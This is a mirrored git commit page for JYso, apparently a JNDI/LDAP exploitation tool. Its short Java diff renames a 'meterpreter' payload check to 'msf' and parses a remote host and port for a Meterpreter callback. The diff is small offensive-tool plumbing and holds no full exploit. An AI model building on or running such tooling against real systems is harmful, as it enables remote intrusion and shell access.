mirror of
https://github.com/qi4L/JYso.git
synced 2026-09-23 07:11:52 +08:00
msf+
This commit is contained in:
@@ -56,7 +56,7 @@ public class BasicController implements LdapController {
|
||||
className = commandTemplate.getClassName();
|
||||
}
|
||||
|
||||
if (payloadType.contains("meterpreter")) {
|
||||
if (payloadType.contains("msf")) {
|
||||
className = Meterpreter.class.getName();
|
||||
}
|
||||
|
||||
@@ -118,7 +118,7 @@ public class BasicController implements LdapController {
|
||||
}
|
||||
|
||||
if (gadgetType == GadgetType.msf) {
|
||||
String[] results1 = Util.getIPAndPortFromBase(base);
|
||||
String[] results1 = Util.getIPAndPortFromBase(base);
|
||||
Config.rhost = results1[0];
|
||||
Config.rport = results1[1];
|
||||
System.out.println("[+] RemotHost: " + results1[0]);
|
||||
|
||||
Reference in New Issue
Block a user